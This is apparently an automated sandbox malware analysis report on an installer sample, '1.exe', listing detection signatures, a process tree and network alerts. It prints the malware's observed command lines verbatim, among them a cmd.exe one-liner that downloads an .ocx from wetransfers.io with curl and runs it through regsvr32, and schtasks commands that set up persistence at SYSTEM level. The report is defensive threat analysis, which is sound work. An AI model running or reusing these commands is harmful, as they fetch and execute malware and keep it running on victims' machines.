

Windows Analysis Report
1.exe

Overview

General Information

Sample name: 1.exe
Analysis ID: 1632500
MD5: 579b4e8f3f1d1ac2b24ad60155a2f355
SHA1: ccd06a9a07fdf919160b5ee49ac055f8770110c4
SHA256: 77be5500892fee02b79e58782dbb213e952d2c4badbb2ab862f3f4d304ec9b4e
Tags: exe, NOBISLLC, user-SquiblydooBlog

Detection

Score: 48
Range: 0 - 100
Confidence: 100%

Compliance

Score: 34
Range: 0 - 100

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Schtasks Creation Or Modification With SYSTEM Privileges
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Sigma detected: Network Connection Initiated By Regsvr32.EXE
Sigma detected: Scripting/CommandLine Process Spawned Regsvr32
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected AdvancedInstaller

Classification

  • System is w10x64
  • 1.exe (PID: 7448 cmdline: "C:\Users\user\Desktop\1.exe" MD5: 579B4E8F3F1D1AC2B24AD60155A2F355)
    • 1.exe (PID: 1928 cmdline: "C:\Users\user\Desktop\1.exe" /i "C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\Distributor Software.msi" AI_EUIMSI=1 APPDIR="C:\Program Files (x86)\Atomix" SECONDSEQUENCE="1" CLIENTPROCESSID="7448" CHAINERUIPROCESSID="7448Chainer" ACTION="INSTALL" EXECUTEACTION="INSTALL" CLIENTUILEVEL="0" ADDLOCAL="MainFeature" PRIMARYFOLDER="APPDIR" ROOTDRIVE="C:\" AI_DETECTED_ADMIN_USER="1" AI_SETUPEXEPATH="C:\Users\user\Desktop\1.exe" SETUPEXEDIR="C:\Users\user\Desktop\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1741399570 " TARGETDIR="C:\" AI_SETUPEXEPATH_ORIGINAL="C:\Users\user\Desktop\1.exe" AI_INSTALL="1" MD5: 579B4E8F3F1D1AC2B24AD60155A2F355)
  • msiexec.exe (PID: 1008 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 2900 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding F574E926F0549E16F7448F5C9BE1C2BF C MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 3120 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 9539C2E5DC35A3081EC0BB575F66643E MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 2212 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 208B5DB405716A1E55D335C3D35AEAD8 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • MainSoftware.exe (PID: 4512 cmdline: "C:\Program Files (x86)\Main\MainSoftware.exe" Persistent MD5: 7E91C0735D8936E8572276340A6F252E)
      • schtasks.exe (PID: 4996 cmdline: "schtasks.exe" /create /sc hourly /tn "MyPersistentApp_Hourly" /tr "\"C:\Program Files (x86)\Main\MainSoftware.exe\" Loop" /ru "user-PC\user" /RL HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 5000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 4936 cmdline: "schtasks.exe" /run /tn "MyPersistentApp_Hourly" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 4928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • SoftwareDistributor.exe (PID: 7776 cmdline: "C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe" https://qb-hos.pages.dev/page-2/?source_id=6 MD5: 9A55270C8C060189F9F805EB78ACEB1B)
      • schtasks.exe (PID: 5456 cmdline: "schtasks" /create /tn "InstallTask_34e8916a-1abe-4e06-987a-f63b64c2e744" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://qb-hos.pages.dev/page-2/?source_id=6" /sc once /st 21:10:47 /ru SYSTEM /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 5604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • MainSoftware.exe (PID: 5412 cmdline: "C:\Program Files (x86)\Main\MainSoftware.exe" Loop MD5: 7E91C0735D8936E8572276340A6F252E)
    • Install.exe (PID: 7260 cmdline: "C:\Program Files (x86)\Main\Chop\Install.exe" MD5: 675F1B648B3E8810A4A32FE32546490B)
      • conhost.exe (PID: 1852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5872 cmdline: "cmd.exe" /v /c"set rnd=%tmp%\%random%0.ocx&& curl --ssl-no-revoke https://wetransfers.io/v.php -o "!rnd!" && regsvr32 /s /i "!rnd!"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • curl.exe (PID: 3300 cmdline: curl --ssl-no-revoke https://wetransfers.io/v.php -o "C:\Users\user\AppData\Local\Temp\219880.ocx" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
        • regsvr32.exe (PID: 3424 cmdline: regsvr32 /s /i "C:\Users\user\AppData\Local\Temp\219880.ocx" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
  • Install.exe (PID: 2896 cmdline: "C:\Program Files\Surfclub\Install.exe" install https://qb-hos.pages.dev/page-2/?source_id=6 MD5: E34B28F5A5D88A3EA073DAB5959EF122)
  • Install.exe (PID: 5064 cmdline: "C:\Program Files\Surfclub\Install.exe" install https://qb-hos.pages.dev/page-2/?source_id=6 MD5: E34B28F5A5D88A3EA073DAB5959EF122)
  • cleanup
No configs have been found
Source               Rule                             Description                       Author         Strings
sslproxydump.pcap    JoeSecurity_AdvancedInstaller    Yara detected AdvancedInstaller   Joe Security

    System Summary

    Source: Process started, Author: Jonathan Cheong, oscd.community, Data: Command: "schtasks" /create /tn "InstallTask_34e8916a-1abe-4e06-987a-f63b64c2e744" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://qb-hos.pages.dev/page-2/?source_id=6" /sc once /st 21:10:47 /ru SYSTEM /f, CommandLine: "schtasks" /create /tn "InstallTask_34e8916a-1abe-4e06-987a-f63b64c2e744" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://qb-hos.pages.dev/page-2/?source_id=6" /sc once /st 21:10:47 /ru SYSTEM /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe" https://qb-hos.pages.dev/page-2/?source_id=6, ParentImage: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe, ParentProcessId: 7776, ParentProcessName: SoftwareDistributor.exe, ProcessCommandLine: "schtasks" /create /tn "InstallTask_34e8916a-1abe-4e06-987a-f63b64c2e744" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://qb-hos.pages.dev/page-2/?source_id=6" /sc once /st 21:10:47 /ru SYSTEM /f, ProcessId: 5456, ProcessName: schtasks.exe
    Source: Process started, Author: Jonathan Cheong, oscd.community, Data: Command: "schtasks" /create /tn "InstallTask_34e8916a-1abe-4e06-987a-f63b64c2e744" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://qb-hos.pages.dev/page-2/?source_id=6" /sc once /st 21:10:47 /ru SYSTEM /f, CommandLine: "schtasks" /create /tn "InstallTask_34e8916a-1abe-4e06-987a-f63b64c2e744" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://qb-hos.pages.dev/page-2/?source_id=6" /sc once /st 21:10:47 /ru SYSTEM /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe" https://qb-hos.pages.dev/page-2/?source_id=6, ParentImage: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe, ParentProcessId: 7776, ParentProcessName: SoftwareDistributor.exe, ProcessCommandLine: "schtasks" /create /tn "InstallTask_34e8916a-1abe-4e06-987a-f63b64c2e744" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://qb-hos.pages.dev/page-2/?source_id=6" /sc once /st 21:10:47 /ru SYSTEM /f, ProcessId: 5456, ProcessName: schtasks.exe
    Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems), Data: Command: "schtasks" /create /tn "InstallTask_34e8916a-1abe-4e06-987a-f63b64c2e744" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://qb-hos.pages.dev/page-2/?source_id=6" /sc once /st 21:10:47 /ru SYSTEM /f, CommandLine: "schtasks" /create /tn "InstallTask_34e8916a-1abe-4e06-987a-f63b64c2e744" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://qb-hos.pages.dev/page-2/?source_id=6" /sc once /st 21:10:47 /ru SYSTEM /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe" https://qb-hos.pages.dev/page-2/?source_id=6, ParentImage: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe, ParentProcessId: 7776, ParentProcessName: SoftwareDistributor.exe, ProcessCommandLine: "schtasks" /create /tn "InstallTask_34e8916a-1abe-4e06-987a-f63b64c2e744" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://qb-hos.pages.dev/page-2/?source_id=6" /sc once /st 21:10:47 /ru SYSTEM /f, ProcessId: 5456, ProcessName: schtasks.exe
    Source: Network Connection, Author: frack113, Data: DestinationIp: 104.21.80.136, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 2212, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49701
    Source: Network Connection, Author: Dmitriy Lifanov, oscd.community, Data: DestinationIp: 149.154.167.220, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\regsvr32.exe, Initiated: true, ProcessId: 3424, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49718
    Source: Process started, Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Data: Command: regsvr32 /s /i "C:\Users\user\AppData\Local\Temp\219880.ocx", CommandLine: regsvr32 /s /i "C:\Users\user\AppData\Local\Temp\219880.ocx", CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: "cmd.exe" /v /c"set rnd=%tmp%\%random%0.ocx&& curl --ssl-no-revoke https://wetransfers.io/v.php -o "!rnd!" && regsvr32 /s /i "!rnd!"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5872, ParentProcessName: cmd.exe, ProcessCommandLine: regsvr32 /s /i "C:\Users\user\AppData\Local\Temp\219880.ocx", ProcessId: 3424, ProcessName: regsvr32.exe
    Source: Process started, Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger, Data: Command: "cmd.exe" /v /c"set rnd=%tmp%\%random%0.ocx&& curl --ssl-no-revoke https://wetransfers.io/v.php -o "!rnd!" && regsvr32 /s /i "!rnd!"", CommandLine: "cmd.exe" /v /c"set rnd=%tmp%\%random%0.ocx&& curl --ssl-no-revoke https://wetransfers.io/v.php -o "!rnd!" && regsvr32 /s /i "!rnd!"", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\Main\Chop\Install.exe" , ParentImage: C:\Program Files (x86)\Main\Chop\Install.exe, ParentProcessId: 7260, ParentProcessName: Install.exe, ProcessCommandLine: "cmd.exe" /v /c"set rnd=%tmp%\%random%0.ocx&& curl --ssl-no-revoke https://wetransfers.io/v.php -o "!rnd!" && regsvr32 /s /i "!rnd!"", ProcessId: 5872, ProcessName: cmd.exe

    Timestamp                          SID       Severity   Classtype                       Source IP      Source Port   Destination IP   Destination Port   Protocol
    2025-03-08T03:08:58.860144+0100    2829202   1          A Network Trojan was detected   192.168.2.5    49701         104.21.80.136    443                TCP
    2025-03-08T03:09:12.361080+0100    2829202   1          A Network Trojan was detected   192.168.2.5    49703         104.21.80.136    443                TCP



    AV Detection

    Source: C:\Program Files (x86)\Main\Chop\Install.exe, ReversingLabs: Detection: 31%
    Source: 1.exe, Virustotal: Detection: 27%
    Source: 1.exe, ReversingLabs: Detection: 21%
    Source: C:\Users\user\Desktop\1.exe, EXE: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\Addons\SoftwareDistributor.exe
    Source: C:\Users\user\Desktop\1.exe, EXE: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\ProgramFilesFolder\Main\MainSoftware.exe

    Compliance

    Source: C:\Users\user\Desktop\1.exe, EXE: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\Addons\SoftwareDistributor.exe
    Source: C:\Users\user\Desktop\1.exe, EXE: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\ProgramFilesFolder\Main\MainSoftware.exe
    Source: 1.exe, Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
    Source: C:\Users\user\Desktop\1.exe, File created: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\Addons\Surfclub\How to uninstall.txt
    Source: C:\Users\user\Desktop\1.exe, File created: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\How to uninstall.txt
    Source: C:\Windows\System32\msiexec.exe, File created: C:\Program Files (x86)\Atomix\Addons\Surfclub\How to uninstall.txt
    Source: C:\Windows\System32\msiexec.exe, File created: C:\Program Files (x86)\Atomix\How to uninstall.txt
    Source: 1.exe, Static PE information: certificate valid
    Source: unknown, HTTPS traffic detected: 104.21.80.136:443 -> 192.168.2.5:49701 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 172.67.135.71:443 -> 192.168.2.5:49704 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 172.67.135.71:443 -> 192.168.2.5:49705 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 172.67.135.71:443 -> 192.168.2.5:49706 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 104.21.80.136:443 -> 192.168.2.5:49711 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 172.67.184.211:443 -> 192.168.2.5:49715 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49718 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49721 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 172.67.184.211:443 -> 192.168.2.5:49724 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49727 version: TLS 1.2
    Source: 1.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdb source: MainSoftware.exe, 00000010.00000002.2142756269.0000027538140000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000015.00000002.2261474850.000002BDD0C91000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Sockets.ni.pdb source: MainSoftware.exe, 00000010.00000002.2143851076.0000027538581000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143804192.0000027538541000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Json\Release\net8.0\System.Text.Json.pdb source: MainSoftware.exe, 00000010.00000002.2143394007.00000275383E1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143312727.000002753834C000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Runtime.InteropServices.RuntimeInformation/Release/net8.0-windows/System.Runtime.InteropServices.RuntimeInformation.pdb source: MainSoftware.exe, 00000010.00000002.2143093774.00000275382B1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: Microsoft.Win32.Registry.ni.pdb source: MainSoftware.exe, 00000010.00000002.2143232066.0000027538317000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143295395.0000027538331000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdbSHA256P?> source: MainSoftware.exe, 00000010.00000002.2142461937.0000027537EE1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142367623.0000027537EB3000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography\Release\net8.0-windows\System.Security.Cryptography.pdb source: MainSoftware.exe, 00000010.00000002.2142592762.0000027537FB6000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142689155.0000027538081000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Ping\Release\net8.0-windows\System.Net.Ping.pdb source: MainSoftware.exe, 00000010.00000002.2141897499.0000027536210000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.X509Certificates/Release/net8.0-windows/System.Security.Cryptography.X509Certificates.pdb source: MainSoftware.exe, 00000010.00000002.2142592762.0000027537FB1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Security.ni.pdb source: MainSoftware.exe, 00000010.00000002.2142559459.0000027537F61000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142488273.0000027537F19000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Security.Principal.Windows.ni.pdb source: MainSoftware.exe, 00000010.00000002.2151399807.000002753B3D1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151185629.000002753B3B1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.NonGeneric\Release\net8.0\System.Collections.NonGeneric.pdb source: MainSoftware.exe, 00000010.00000002.2143077066.00000275382A1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143041301.0000027538291000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.ObjectModel.ni.pdb source: MainSoftware.exe, 00000010.00000002.2140691802.00000275352B4000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdbSHA256t source: MainSoftware.exe, 00000010.00000002.2143935572.00000275385E2000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143966375.00000275385F1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Http.Json.ni.pdb source: MainSoftware.exe, 00000010.00000002.2143160448.00000275382EA000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143209931.0000027538301000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Concurrent\Release\net8.0\System.Collections.Concurrent.pdb source: MainSoftware.exe, 00000010.00000002.2143697931.00000275384FD000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143781631.0000027538521000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\Users\Admin\Distributor\Installers Project\Generic\ConsoleApp1\obj\Release\net8.0\win-x64\ConsoleApp1.pdb source: MainSoftware.exe, 00000010.00000002.2139786896.000002349ED61000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2139740826.000002349ED57000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NameResolution\Release\net8.0-windows\System.Net.NameResolution.pdb source: MainSoftware.exe, 00000010.00000002.2150696251.000002753B381000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2150453848.000002753B36D000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdb source: MainSoftware.exe, 00000010.00000002.2140001032.000002349EDF3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2140127974.00000234A06D1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Text.Json.ni.pdb source: MainSoftware.exe, 00000010.00000002.2143394007.00000275383E1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143312727.000002753834C000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Linq.ni.pdb source: MainSoftware.exe, 00000010.00000002.2140001032.000002349EDF3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2140127974.00000234A06D1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net8.0\System.Diagnostics.Tracing.pdb source: MainSoftware.exe, 00000010.00000002.2141976926.0000027536269000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142022174.0000027536271000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.ComponentModel.EventBasedAsync.ni.pdb source: MainSoftware.exe, 00000010.00000002.2142971155.0000027538262000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Numerics.Vectors\Release\net8.0\System.Numerics.Vectors.pdbSHA256 source: MainSoftware.exe, 00000010.00000002.2143681745.00000275384E1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2143619192.00000275384DC000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/src/Serilog/obj/Release/net8.0/Serilog.pdb source: MainSoftware.exe, 00000010.00000002.2140213322.00000234A0741000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2140154271.00000234A070D000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: wininet.pdbUGP source: 1.exe, 00000004.00000003.1321424870.0000000009918000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517432545.000000000744C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Collections.ni.pdb source: MainSoftware.exe, 00000010.00000002.2139962633.000002349EDC9000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2139926749.000002349ED91000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdbSHA256 source: MainSoftware.exe, 00000010.00000002.2141840198.0000027536161000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141751848.00000275360B8000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Private.CoreLib.ni.pdb source: MainSoftware.exe, 00000010.00000002.2140691802.00000275352BE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141123759.0000027535751000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Uri\Release\net8.0\System.Private.Uri.pdb source: MainSoftware.exe, 00000010.00000002.2142815364.0000027538167000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142869783.0000027538191000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Primitives\Release\net8.0-windows\System.Net.Primitives.pdb source: MainSoftware.exe, 00000010.00000002.2141954837.0000027536241000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141897499.000002753621B000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net8.0\System.Threading.pdb source: MainSoftware.exe, 00000010.00000002.2139484867.000002349EBE1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2142756269.000002753814B000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdbSHA256 source: MainSoftware.exe, 00000010.00000002.2142756269.0000027538140000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000015.00000002.2261474850.000002BDD0C91000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Security.Claims.ni.pdb source: MainSoftware.exe, 00000010.00000002.2151555653.000002753B3F7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151813644.000002753B411000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.X509Certificates/Release/net8.0-windows/System.Security.Cryptography.X509Certificates.pdbSHA256 source: MainSoftware.exe, 00000010.00000002.2142592762.0000027537FB1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Runtime.InteropServices.RuntimeInformation/Release/net8.0-windows/System.Runtime.InteropServices.RuntimeInformation.pdbSHA256 source: MainSoftware.exe, 00000010.00000002.2143093774.00000275382B1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Ping.ni.pdb source: MainSoftware.exe, 00000010.00000002.2141897499.0000027536210000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ObjectModel\Release\net8.0\System.ObjectModel.pdb source: MainSoftware.exe, 00000010.00000002.2140691802.00000275352B4000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x64\Release\System.Private.CoreLib.pdb source: MainSoftware.exe, 00000010.00000002.2140691802.00000275352BE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141123759.0000027535751000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Ping\Release\net8.0-windows\System.Net.Ping.pdbSHA256S source: MainSoftware.exe, 00000010.00000002.2141897499.0000027536210000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Memory\Release\net8.0\System.Memory.pdb source: MainSoftware.exe, 00000010.00000002.2152351430.000002753B451000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151993346.000002753B43C000.00000002.00000001.00040000.0000000A.sdmp
